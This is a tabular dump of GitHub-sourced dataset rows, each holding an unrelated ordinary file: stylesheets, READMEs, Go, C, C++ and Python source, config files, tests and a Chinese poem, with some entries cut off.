text
stringlengths 2
9.79k
| meta
dict | sentences_perturbed
int64 0
2
⌀ | doc_stats
dict |
|---|---|---|---|
.row-split {
.col-content {
margin-top: 20px;
}
@media (min-width: @media-xs) {
display: flex;
flex-direction: row;
.col-side {
width: 360px;
}
.col-content {
flex-grow: 1;
margin-top: 0;
}
}
}
.palette-preview {
.rs-panel {
position: relative;
height: 578px;
}
}
.panel-color-wrap {
.panel-color {
th,
td {
text-align: left;
padding: 11px;
font-family: 'DejaVu Sans Mono';
}
}
}
.palette-logo-tool {
margin-top: 20px;
}
.palette-image-preview {
position: relative;
margin-top: 20px;
padding: 10px;
border-radius: 6px;
}
.palette-image-position-dot {
position: absolute;
background: #fff;
width: 8px;
height: 8px;
border-radius: 4px;
border: 1px solid #000;
}
.circle-picker-wrapper {
display: inline-block;
vertical-align: top;
}
.sketch-picker-wrapper {
margin-left: 20px;
display: inline-block;
position: relative;
.sketch-color-review {
padding: 5px;
background: rgb(255, 255, 255);
border-radius: 1px;
box-shadow: rgba(0, 0, 0, 0.1) 0px 0px 0px 1px;
display: inline-block;
cursor: pointer;
}
.sketch-color-value {
width: 68px;
height: 100px;
border-radius: 2px;
}
.sketch-picker-overlay {
position: absolute;
z-index: 2;
}
.sketch-picker-backdrop {
position: fixed;
top: 0px;
right: 0px;
bottom: 0px;
left: 0px;
}
}
|
{
"pile_set_name": "Github"
}
| null | null |
# minimatch
A minimal matching utility.
[](http://travis-ci.org/isaacs/minimatch)
This is the matching library used internally by npm.
Eventually, it will replace the C binding in node-glob.
It works by converting glob expressions into JavaScript `RegExp`
objects.
## Usage
```javascript
var minimatch = require("minimatch")
minimatch("bar.foo", "*.foo") // true!
minimatch("bar.foo", "*.bar") // false!
minimatch("bar.foo", "*.+(bar|foo)", { debug: true }) // true, and noisy!
```
## Features
Supports these glob features:
* Brace Expansion
* Extended glob matching
* "Globstar" `**` matching
See:
* `man sh`
* `man bash`
* `man 3 fnmatch`
* `man 5 gitignore`
## Minimatch Class
Create a minimatch object by instanting the `minimatch.Minimatch` class.
```javascript
var Minimatch = require("minimatch").Minimatch
var mm = new Minimatch(pattern, options)
```
### Properties
* `pattern` The original pattern the minimatch object represents.
* `options` The options supplied to the constructor.
* `set` A 2-dimensional array of regexp or string expressions.
Each row in the
array corresponds to a brace-expanded pattern. Each item in the row
corresponds to a single path-part. For example, the pattern
`{a,b/c}/d` would expand to a set of patterns like:
[ [ a, d ]
, [ b, c, d ] ]
If a portion of the pattern doesn't have any "magic" in it
(that is, it's something like `"foo"` rather than `fo*o?`), then it
will be left as a string rather than converted to a regular
expression.
* `regexp` Created by the `makeRe` method. A single regular expression
expressing the entire pattern. This is useful in cases where you wish
to use the pattern somewhat like `fnmatch(3)` with `FNM_PATH` enabled.
* `negate` True if the pattern is negated.
* `comment` True if the pattern is a comment.
* `empty` True if the pattern is `""`.
### Methods
* `makeRe` Generate the `regexp` member if necessary, and return it.
Will return `false` if the pattern is invalid.
* `match(fname)` Return true if the filename matches the pattern, or
false otherwise.
* `matchOne(fileArray, patternArray, partial)` Take a `/`-split
filename, and match it against a single row in the `regExpSet`. This
method is mainly for internal use, but is exposed so that it can be
used by a glob-walker that needs to avoid excessive filesystem calls.
All other methods are internal, and will be called as necessary.
## Functions
The top-level exported function has a `cache` property, which is an LRU
cache set to store 100 items. So, calling these methods repeatedly
with the same pattern and options will use the same Minimatch object,
saving the cost of parsing it multiple times.
### minimatch(path, pattern, options)
Main export. Tests a path against the pattern using the options.
```javascript
var isJS = minimatch(file, "*.js", { matchBase: true })
```
### minimatch.filter(pattern, options)
Returns a function that tests its
supplied argument, suitable for use with `Array.filter`. Example:
```javascript
var javascripts = fileList.filter(minimatch.filter("*.js", {matchBase: true}))
```
### minimatch.match(list, pattern, options)
Match against the list of
files, in the style of fnmatch or glob. If nothing is matched, and
options.nonull is set, then return a list containing the pattern itself.
```javascript
var javascripts = minimatch.match(fileList, "*.js", {matchBase: true}))
```
### minimatch.makeRe(pattern, options)
Make a regular expression object from the pattern.
## Options
All options are `false` by default.
### debug
Dump a ton of stuff to stderr.
### nobrace
Do not expand `{a,b}` and `{1..3}` brace sets.
### noglobstar
Disable `**` matching against multiple folder names.
### dot
Allow patterns to match filenames starting with a period, even if
the pattern does not explicitly have a period in that spot.
Note that by default, `a/**/b` will **not** match `a/.d/b`, unless `dot`
is set.
### noext
Disable "extglob" style patterns like `+(a|b)`.
### nocase
Perform a case-insensitive match.
### nonull
When a match is not found by `minimatch.match`, return a list containing
the pattern itself. When set, an empty list is returned if there are
no matches.
### matchBase
If set, then patterns without slashes will be matched
against the basename of the path if it contains slashes. For example,
`a?b` would match the path `/xyz/123/acb`, but not `/xyz/acb/123`.
### nocomment
Suppress the behavior of treating `#` at the start of a pattern as a
comment.
### nonegate
Suppress the behavior of treating a leading `!` character as negation.
### flipNegate
Returns from negate expressions the same as if they were not negated.
(Ie, true on a hit, false on a miss.)
## Comparisons to other fnmatch/glob implementations
While strict compliance with the existing standards is a worthwhile
goal, some discrepancies exist between minimatch and other
implementations, and are intentional.
If the pattern starts with a `!` character, then it is negated. Set the
`nonegate` flag to suppress this behavior, and treat leading `!`
characters normally. This is perhaps relevant if you wish to start the
pattern with a negative extglob pattern like `!(a|B)`. Multiple `!`
characters at the start of a pattern will negate the pattern multiple
times.
If a pattern starts with `#`, then it is treated as a comment, and
will not match anything. Use `\#` to match a literal `#` at the
start of a line, or set the `nocomment` flag to suppress this behavior.
The double-star character `**` is supported by default, unless the
`noglobstar` flag is set. This is supported in the manner of bsdglob
and bash 4.1, where `**` only has special significance if it is the only
thing in a path part. That is, `a/**/b` will match `a/x/y/b`, but
`a/**b` will not.
If an escaped pattern has no matches, and the `nonull` flag is set,
then minimatch.match returns the pattern as-provided, rather than
interpreting the character escapes. For example,
`minimatch.match([], "\\*a\\?")` will return `"\\*a\\?"` rather than
`"*a?"`. This is akin to setting the `nullglob` option in bash, except
that it does not resolve escaped pattern characters.
If brace expansion is not disabled, then it is performed before any
other interpretation of the glob pattern. Thus, a pattern like
`+(a|{b),c)}`, which would not be valid in bash or zsh, is expanded
**first** into the set of `+(a|b)` and `+(a|c)`, and those patterns are
checked for validity. Since those two are valid, matching proceeds.
|
{
"pile_set_name": "Github"
}
| null | null |
/*
Copyright 2016 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package homedir
import (
"os"
"path/filepath"
"runtime"
)
// HomeDir returns the home directory for the current user.
// On Windows:
// 1. the first of %HOME%, %HOMEDRIVE%%HOMEPATH%, %USERPROFILE% containing a `.kube\config` file is returned.
// 2. if none of those locations contain a `.kube\config` file, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that exists and is writeable is returned.
// 3. if none of those locations are writeable, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that exists is returned.
// 4. if none of those locations exists, the first of %HOME%, %USERPROFILE%, %HOMEDRIVE%%HOMEPATH% that is set is returned.
func HomeDir() string {
if runtime.GOOS == "windows" {
home := os.Getenv("HOME")
homeDriveHomePath := ""
if homeDrive, homePath := os.Getenv("HOMEDRIVE"), os.Getenv("HOMEPATH"); len(homeDrive) > 0 && len(homePath) > 0 {
homeDriveHomePath = homeDrive + homePath
}
userProfile := os.Getenv("USERPROFILE")
// Return first of %HOME%, %HOMEDRIVE%/%HOMEPATH%, %USERPROFILE% that contains a `.kube\config` file.
// %HOMEDRIVE%/%HOMEPATH% is preferred over %USERPROFILE% for backwards-compatibility.
for _, p := range []string{home, homeDriveHomePath, userProfile} {
if len(p) == 0 {
continue
}
if _, err := os.Stat(filepath.Join(p, ".kube", "config")); err != nil {
continue
}
return p
}
firstSetPath := ""
firstExistingPath := ""
// Prefer %USERPROFILE% over %HOMEDRIVE%/%HOMEPATH% for compatibility with other auth-writing tools
for _, p := range []string{home, userProfile, homeDriveHomePath} {
if len(p) == 0 {
continue
}
if len(firstSetPath) == 0 {
// remember the first path that is set
firstSetPath = p
}
info, err := os.Stat(p)
if err != nil {
continue
}
if len(firstExistingPath) == 0 {
// remember the first path that exists
firstExistingPath = p
}
if info.IsDir() && info.Mode().Perm()&(1<<(uint(7))) != 0 {
// return first path that is writeable
return p
}
}
// If none are writeable, return first location that exists
if len(firstExistingPath) > 0 {
return firstExistingPath
}
// If none exist, return first location that is set
if len(firstSetPath) > 0 {
return firstSetPath
}
// We've got nothing
return ""
}
return os.Getenv("HOME")
}
|
{
"pile_set_name": "Github"
}
| null | null |
nelmio_cors:
defaults:
origin_regex: true
allow_origin: ['%env(CORS_ALLOW_ORIGIN)%']
allow_methods: ['GET', 'OPTIONS', 'POST', 'PUT', 'PATCH', 'DELETE']
allow_headers: ['Content-Type', 'Authorization', 'Preload', 'Fields']
expose_headers: ['Link']
max_age: 3600
paths:
'^/': null
|
{
"pile_set_name": "Github"
}
| null | null |
import { run } from '@ember/runloop';
import { module, test } from 'qunit';
import { setupRenderingTest } from 'ember-qunit';
import { render } from '@ember/test-helpers';
import setupStyles from '../helpers/render-with-styles';
module('Integration | Changing local classes', function(hooks) {
setupRenderingTest(hooks);
test('changing a dynamic class value works', async function(assert) {
const hbs = setupStyles({
foo: '--foo',
bar: '--bar',
baz: '--baz'
});
this.set('extraClass', 'bar');
await render(hbs`<div data-test-element class="global" local-class="foo {{extraClass}}"></div>`);
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo --bar');
run(() => this.set('extraClass', 'baz'));
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo --baz');
run(() => this.set('extraClass', 'qux'));
assert.dom('[data-test-element]').hasAttribute('class', 'global --foo');
});
});
|
{
"pile_set_name": "Github"
}
| null | null |
form=词
tags=
放扁舟、万山环处,
平铺碧浪千顷。
仙人怜我征尘久,
借与梦游清枕。
风乍静。
望两岸群峰,
倒浸玻璃影。
楼台相映。
更日薄烟轻,
荷花似醉,
飞鸟堕寒镜。
中都内,
罗绮千街万井。
天教此地幽胜。
仇池仙伯今何在,
堤柳几眠还醒。
君试问。
□此意、只今更有何人领。
功名未竟。
待学取鸱夷,
仍携西子,
来动五湖兴。
|
{
"pile_set_name": "Github"
}
| null | null |
{
"gender": "female",
"species": "ostrich",
"birthday": "7-31",
"games": {
"afe+": {
"personality": "snooty",
"clothes": "red-aloha-shirt",
"song": "K.K. Sonata"
},
"nl": {
"personality": "snooty",
"clothes": "purple-tie-dye-tee",
"song": "K.K. Sonata",
"phrase": "dahling",
"skill": "Computing",
"goal": "CEO",
"fear": "Mummy Mask",
"quote": "Cut once, measure twice... Wait- reverse that.",
"siblings": "Youngest triplet",
"favoriteStyle": "Basic",
"dislikedStyle": "Rock",
"favoriteColor": "Red",
"coffee": {
"beans": "Blue Mountain",
"milk": "Lots of milk",
"sugar": "3 spoonfuls of sugar"
}
},
"nh": {
"personality": "snooty",
"phrase": "dahling",
"song": "K.K. Sonata"
}
},
"name": "Julia",
"id": "julia"
}
|
{
"pile_set_name": "Github"
}
| null | null |
fileFormatVersion: 2
guid: 91035448860ba4e708919485c73f7edc
timeCreated: 1442945121
licenseType: Pro
NativeFormatImporter:
userData:
assetBundleName:
assetBundleVariant:
|
{
"pile_set_name": "Github"
}
| null | null |
#ifndef QEMU_SMBIOS_H
#define QEMU_SMBIOS_H
/*
* SMBIOS Support
*
* Copyright (C) 2009 Hewlett-Packard Development Company, L.P.
*
* Authors:
* Alex Williamson <alex.williamson@hp.com>
*
* This work is licensed under the terms of the GNU GPL, version 2. See
* the COPYING file in the top-level directory.
*
*/
#include "qemu/option.h"
#define SMBIOS_MAX_TYPE 127
/* memory area description, used by type 19 table */
struct smbios_phys_mem_area {
uint64_t address;
uint64_t length;
};
/*
* SMBIOS spec defined tables
*/
typedef enum SmbiosEntryPointType {
SMBIOS_ENTRY_POINT_21,
SMBIOS_ENTRY_POINT_30,
} SmbiosEntryPointType;
/* SMBIOS Entry Point
* There are two types of entry points defined in the SMBIOS specification
* (see below). BIOS must place the entry point(s) at a 16-byte-aligned
* address between 0xf0000 and 0xfffff. Note that either entry point type
* can be used in a 64-bit target system, except that SMBIOS 2.1 entry point
* only allows the SMBIOS struct table to reside below 4GB address space.
*/
/* SMBIOS 2.1 (32-bit) Entry Point
* - introduced since SMBIOS 2.1
* - supports structure table below 4GB only
*/
struct smbios_21_entry_point {
uint8_t anchor_string[4];
uint8_t checksum;
uint8_t length;
uint8_t smbios_major_version;
uint8_t smbios_minor_version;
uint16_t max_structure_size;
uint8_t entry_point_revision;
uint8_t formatted_area[5];
uint8_t intermediate_anchor_string[5];
uint8_t intermediate_checksum;
uint16_t structure_table_length;
uint32_t structure_table_address;
uint16_t number_of_structures;
uint8_t smbios_bcd_revision;
} QEMU_PACKED;
/* SMBIOS 3.0 (64-bit) Entry Point
* - introduced since SMBIOS 3.0
* - supports structure table at 64-bit address space
*/
struct smbios_30_entry_point {
uint8_t anchor_string[5];
uint8_t checksum;
uint8_t length;
uint8_t smbios_major_version;
uint8_t smbios_minor_version;
uint8_t smbios_doc_rev;
uint8_t entry_point_revision;
uint8_t reserved;
uint32_t structure_table_max_size;
uint64_t structure_table_address;
} QEMU_PACKED;
typedef union {
struct smbios_21_entry_point ep21;
struct smbios_30_entry_point ep30;
} QEMU_PACKED SmbiosEntryPoint;
/* This goes at the beginning of every SMBIOS structure. */
struct smbios_structure_header {
uint8_t type;
uint8_t length;
uint16_t handle;
} QEMU_PACKED;
/* SMBIOS type 0 - BIOS Information */
struct smbios_type_0 {
struct smbios_structure_header header;
uint8_t vendor_str;
uint8_t bios_version_str;
uint16_t bios_starting_address_segment;
uint8_t bios_release_date_str;
uint8_t bios_rom_size;
uint64_t bios_characteristics;
uint8_t bios_characteristics_extension_bytes[2];
uint8_t system_bios_major_release;
uint8_t system_bios_minor_release;
uint8_t embedded_controller_major_release;
uint8_t embedded_controller_minor_release;
} QEMU_PACKED;
/* UUID encoding. The time_* fields are little-endian, as specified by SMBIOS
* version 2.6.
*/
struct smbios_uuid {
uint32_t time_low;
uint16_t time_mid;
uint16_t time_hi_and_version;
uint8_t clock_seq_hi_and_reserved;
uint8_t clock_seq_low;
uint8_t node[6];
} QEMU_PACKED;
/* SMBIOS type 1 - System Information */
struct smbios_type_1 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t product_name_str;
uint8_t version_str;
uint8_t serial_number_str;
struct smbios_uuid uuid;
uint8_t wake_up_type;
uint8_t sku_number_str;
uint8_t family_str;
} QEMU_PACKED;
/* SMBIOS type 2 - Base Board */
struct smbios_type_2 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t product_str;
uint8_t version_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t feature_flags;
uint8_t location_str;
uint16_t chassis_handle;
uint8_t board_type;
uint8_t contained_element_count;
/* contained elements follow */
} QEMU_PACKED;
/* SMBIOS type 3 - System Enclosure (v2.7) */
struct smbios_type_3 {
struct smbios_structure_header header;
uint8_t manufacturer_str;
uint8_t type;
uint8_t version_str;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t boot_up_state;
uint8_t power_supply_state;
uint8_t thermal_state;
uint8_t security_status;
uint32_t oem_defined;
uint8_t height;
uint8_t number_of_power_cords;
uint8_t contained_element_count;
uint8_t sku_number_str;
/* contained elements follow */
} QEMU_PACKED;
/* SMBIOS type 4 - Processor Information (v2.6) */
struct smbios_type_4 {
struct smbios_structure_header header;
uint8_t socket_designation_str;
uint8_t processor_type;
uint8_t processor_family;
uint8_t processor_manufacturer_str;
uint32_t processor_id[2];
uint8_t processor_version_str;
uint8_t voltage;
uint16_t external_clock;
uint16_t max_speed;
uint16_t current_speed;
uint8_t status;
uint8_t processor_upgrade;
uint16_t l1_cache_handle;
uint16_t l2_cache_handle;
uint16_t l3_cache_handle;
uint8_t serial_number_str;
uint8_t asset_tag_number_str;
uint8_t part_number_str;
uint8_t core_count;
uint8_t core_enabled;
uint8_t thread_count;
uint16_t processor_characteristics;
uint16_t processor_family2;
} QEMU_PACKED;
/* SMBIOS type 16 - Physical Memory Array (v2.7) */
struct smbios_type_16 {
struct smbios_structure_header header;
uint8_t location;
uint8_t use
|
{
"pile_set_name": "Github"
}
| null | null |
import astf_path
class ErrorLogger():
def __init__(self, name, allowed_errors):
self.iteration_counter = 0
self.name = name
self.client_allowed_errors = set(allowed_errors['client'])
self.server_allowed_errors = set(allowed_errors['server'])
self.iteration_to_mult_map = {}
self.iteration_to_error_map = {}
def increment_iteration_counter(self):
self.iteration_counter += 1
def log(self, errors):
self.iteration_to_error_map[self.iteration_counter] = errors
def log_multiplier(self, mult):
self.iteration_to_mult_map[self.iteration_counter] = mult
def should_stop(self):
return self.iteration_counter == 5
def invalid_errors(self, errors):
client_errors = set(errors.get('client', []))
server_errors = set(errors.get('server', []))
return not (client_errors.issubset(self.client_allowed_errors) and server_errors.issubset(self.server_allowed_errors))
class ErrorLoggingNDRPlugin():
def __init__(self, **kwargs):
allowed_errors = {'client': {u'tcps_conndrops': u'embryonic connections dropped'},
'server': {u'err_no_template': u"server can't match L7 template",
u'err_no_syn': u'server first flow packet with no SYN'}
}
self.logger = ErrorLogger(name="Plugin Demonstration for ASTF NDR", allowed_errors=allowed_errors)
def pre_iteration(self, run_results=None, **kwargs):
pass
def post_iteration(self, run_results, **kwargs):
if run_results['error_flag']:
self.logger.log(run_results['errors'])
self.logger.log_multiplier(run_results['mult'])
self.logger.increment_iteration_counter()
should_stop = self.logger.should_stop()
invalid_errors = self.logger.invalid_errors(run_results['errors'])
return should_stop, invalid_errors
# dynamic load of python module
def register():
return ErrorLoggingNDRPlugin()
|
{
"pile_set_name": "Github"
}
| null | null |
// Copyright (c) 2018 The LevelDB Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file. See the AUTHORS file for names of contributors.
// Prevent Windows headers from defining min/max macros and instead
// use STL.
#ifndef NOMINMAX
#define NOMINMAX
#endif // ifndef NOMINMAX
#include <windows.h>
#include <algorithm>
#include <atomic>
#include <chrono>
#include <condition_variable>
#include <cstddef>
#include <cstdint>
#include <cstdlib>
#include <cstring>
#include <memory>
#include <mutex>
#include <queue>
#include <sstream>
#include <string>
#include <vector>
#include "leveldb/env.h"
#include "leveldb/slice.h"
#include "port/port.h"
#include "port/thread_annotations.h"
#include "util/env_windows_test_helper.h"
#include "util/logging.h"
#include "util/mutexlock.h"
#include "util/windows_logger.h"
namespace leveldb {
namespace {
constexpr const size_t kWritableFileBufferSize = 65536;
// Up to 1000 mmaps for 64-bit binaries; none for 32-bit.
constexpr int kDefaultMmapLimit = (sizeof(void*) >= 8) ? 1000 : 0;
// Can be set by by EnvWindowsTestHelper::SetReadOnlyMMapLimit().
int g_mmap_limit = kDefaultMmapLimit;
std::string GetWindowsErrorMessage(DWORD error_code) {
std::string message;
char* error_text = nullptr;
// Use MBCS version of FormatMessage to match return value.
size_t error_text_size = ::FormatMessageA(
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_IGNORE_INSERTS,
nullptr, error_code, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
reinterpret_cast<char*>(&error_text), 0, nullptr);
if (!error_text) {
return message;
}
message.assign(error_text, error_text_size);
::LocalFree(error_text);
return message;
}
Status WindowsError(const std::string& context, DWORD error_code) {
if (error_code == ERROR_FILE_NOT_FOUND || error_code == ERROR_PATH_NOT_FOUND)
return Status::NotFound(context, GetWindowsErrorMessage(error_code));
return Status::IOError(context, GetWindowsErrorMessage(error_code));
}
class ScopedHandle {
public:
ScopedHandle(HANDLE handle) : handle_(handle) {}
ScopedHandle(const ScopedHandle&) = delete;
ScopedHandle(ScopedHandle&& other) noexcept : handle_(other.Release()) {}
~ScopedHandle() { Close(); }
ScopedHandle& operator=(const ScopedHandle&) = delete;
ScopedHandle& operator=(ScopedHandle&& rhs) noexcept {
if (this != &rhs) handle_ = rhs.Release();
return *this;
}
bool Close() {
if (!is_valid()) {
return true;
}
HANDLE h = handle_;
handle_ = INVALID_HANDLE_VALUE;
return ::CloseHandle(h);
}
bool is_valid() const {
return handle_ != INVALID_HANDLE_VALUE && handle_ != nullptr;
}
HANDLE get() const { return handle_; }
HANDLE Release() {
HANDLE h = handle_;
handle_ = INVALID_HANDLE_VALUE;
return h;
}
private:
HANDLE handle_;
};
// Helper class to limit resource usage to avoid exhaustion.
// Currently used to limit read-only file descriptors and mmap file usage
// so that we do not run out of file descriptors or virtual memory, or run into
// kernel performance problems for very large databases.
class Limiter {
public:
// Limit maximum number of resources to |max_acquires|.
Limiter(int max_acquires) : acquires_allowed_(max_acquires) {}
Limiter(const Limiter&) = delete;
Limiter operator=(const Limiter&) = delete;
// If another resource is available, acquire it and return true.
// Else return false.
bool Acquire() {
int old_acquires_allowed =
acquires_allowed_.fetch_sub(1, std::memory_order_relaxed);
if (old_acquires_allowed > 0) return true;
acquires_allowed_.fetch_add(1, std::memory_order_relaxed);
return false;
}
// Release a resource acquired by a previous call to Acquire() that returned
// true.
void Release() { acquires_allowed_.fetch_add(1, std::memory_order_relaxed); }
private:
// The number of available resources.
//
// This is a counter and is not tied to the invariants of any other class, so
// it can be operated on safely using std::memory_order_relaxed.
std::atomic<int> acquires_allowed_;
};
class WindowsSequentialFile : public SequentialFile {
public:
WindowsSequentialFile(std::string filename, ScopedHandle handle)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsSequentialFile() override {}
Status Read(size_t n, Slice* result, char* scratch) override {
DWORD bytes_read;
// DWORD is 32-bit, but size_t could technically be larger. However leveldb
// files are limited to leveldb::Options::max_file_size which is clamped to
// 1<<30 or 1 GiB.
assert(n <= std::numeric_limits<DWORD>::max());
if (!::ReadFile(handle_.get(), scratch, static_cast<DWORD>(n), &bytes_read,
nullptr)) {
return WindowsError(filename_, ::GetLastError());
}
*result = Slice(scratch, bytes_read);
return Status::OK();
}
Status Skip(uint64_t n) override {
LARGE_INTEGER distance;
distance.QuadPart = n;
if (!::SetFilePointerEx(handle_.get(), distance, nullptr, FILE_CURRENT)) {
return WindowsError(filename_, ::GetLastError());
}
return Status::OK();
}
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsRandomAccessFile : public RandomAccessFile {
public:
WindowsRandomAccessFile(std::string filename, ScopedHandle handle)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsRandomAccessFile() override = default;
Status Read(uint64_t offset, size_t n, Slice* result,
char* scratch) const override {
DWORD bytes_read = 0;
OVERLAPPED overlapped = {0};
overlapped.OffsetHigh = static_cast<DWORD>(offset >> 32);
overlapped.Offset = static_cast<DWORD>(offset);
if (!::ReadFile(handle_.get(), scratch, static_cast<DWORD>(n), &bytes_read,
&overlapped)) {
DWORD error_code = ::GetLastError();
if (error_code != ERROR_HANDLE_EOF) {
*result = Slice(scratch, 0);
return Status::IOError(filename_, GetWindowsErrorMessage(error_code));
}
}
*result = Slice(scratch, bytes_read);
return Status::OK();
}
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsMmapReadableFile : public RandomAccessFile {
public:
// base[0,length-1] contains the mmapped contents of the file.
WindowsMmapReadableFile(std::string filename, char* mmap_base, size_t length,
Limiter* mmap_limiter)
: mmap_base_(mmap_base),
length_(length),
|
{
"pile_set_name": "Github"
}
| null | null |
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Oracle nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-->
<project name="TransparentRuler" basedir="." default="jar">
<import file="nbproject/jdk.xml"/>
<target name="-prop-init">
<property file="user.build.properties"/>
<property file="build.properties"/>
</target>
<target name="-init" depends="-prop-init,-jdk-init"/>
<target name="compile" depends="-init" description="Compile main sources.">
<mkdir dir="${classes.dir}"/>
<javac srcdir="${src.dir}" destdir="${classes.dir}" debug="${debug}" deprecation="${deprecation}">
<classpath path="${cp}"/>
</javac>
<copy todir="${classes.dir}">
<fileset dir="${src.dir}"/>
</copy>
</target>
<target name="jar" depends="compile" description="Build JAR file for main sources.">
<jar jarfile="${jar}" compress="true">
<manifest>
<attribute name="Main-Class" value="${main.class}"/>
</manifest>
<fileset dir="${classes.dir}"/>
</jar>
</target>
<target name="run" depends="compile" description="Run application.">
<fail unless="main.class">Must set property 'main.class' (e.g. in build.properties)</fail>
<java classname="${main.class}" fork="true" failonerror="true">
<classpath path="${run.cp}"/>
</java>
</target>
<target name="javadoc" depends="-init" description="Build Javadoc.">
<mkdir dir="${javadoc.dir}"/>
<javadoc destdir="${javadoc.dir}">
<classpath path="${cp}"/>
<sourcepath>
<pathelement location="${src.dir}"/>
</sourcepath>
<fileset dir="${src.dir}"/>
</javadoc>
</target>
<target name="clean" depends="-init" description="Clean build products.">
<delete dir="${build.dir}"/>
<delete file="${jar}"/>
</target>
<target name="profile">
<ant antfile="nbproject/netbeans-targets.xml" target="profile"/>
</target>
</project>
|
{
"pile_set_name": "Github"
}
| null | null |
# computed by luarocks/buildroot
sha256 01211bb80dab92f87cece6e31854d73ae4a2ce06af7c48423a54313d72adf9fb wsapi-xavante-1.7-1.src.rock
sha256 6aa14e3febf7a9e810ce672b015f5a5514241ce5d1c3a6a48f921f089d270159 wsapi/doc/us/license.html
sha256 c7bf3061d00a96d10cb9dbc3a737d0af22594e2ef8f788842d7ab92eeaa864f2 wsapi/doc/us/license.md
|
{
"pile_set_name": "Github"
}
| null | null |
# Dropbox JavaScript SDK Examples
To run the examples in your development environment:
1. Clone this repo
2. Run `npm install`
3. From the root of your repository, start the development server with
`npm start`.
4. Point your browser to <http://0.0.0.0:8080/>
## Code flow example
1. Clone this repo
2. Run `npm install`
3. Create an app in the [App console](https://www.dropbox.com/developers/apps).
4. Set a redirect URI "http://localhost:3000/auth" on the app's page on the [App
console](https://www.dropbox.com/developers/apps).
5. Set app key and secret in `examples/javascript/code_flow_example.js` on lines
17 and 18.
6. Run `node examples/javascript/code_flow_example.js`
7. Point your browser to <http://0.0.0.0:3000/>
|
{
"pile_set_name": "Github"
}
| null | null |
echo "Starting eosiodev service ..."
if [ "$(ls -A $DATA_DIR)" ]; then
/opt/eosio/bin/nodeos --config-dir $CONFIG_DIR --data-dir $DATA_DIR -e --hard-replay
else
/opt/eosio/bin/nodeos --config-dir $CONFIG_DIR --data-dir $DATA_DIR -e #--delete-all-blocks
fi
|
{
"pile_set_name": "Github"
}
| null | null |
--TEST--
"set" tag block capture
--TEMPLATE--
{% set foo %}f<br />o<br />o{% endset %}
{{ foo }}
--DATA--
return []
--EXPECT--
f<br />o<br />o
|
{
"pile_set_name": "Github"
}
| null | null |
import pytest
from utils.urls import assert_valid_url
from .map_301 import (
DEFAULT_SAMPLES_URLS,
FIREFOX_ACCOUNTS_URLS,
GITHUB_IO_URLS,
LEGACY_URLS,
MARIONETTE_URLS,
MOZILLADEMOS_URLS,
REDIRECT_URLS,
SCL3_REDIRECT_URLS,
WEBEXT_URLS,
ZONE_REDIRECT_URLS,
)
# while these test methods are similar, they're each testing a
# subset of redirects, and it was easier to work with them separately.
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", REDIRECT_URLS, ids=[item["url"] for item in REDIRECT_URLS]
)
def test_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", GITHUB_IO_URLS, ids=[item["url"] for item in GITHUB_IO_URLS]
)
def test_github_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", MOZILLADEMOS_URLS, ids=[item["url"] for item in MOZILLADEMOS_URLS]
)
def test_mozillademos_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", DEFAULT_SAMPLES_URLS, ids=[item["url"] for item in DEFAULT_SAMPLES_URLS]
)
def test_default_samples_redirects(url, base_url, media_url):
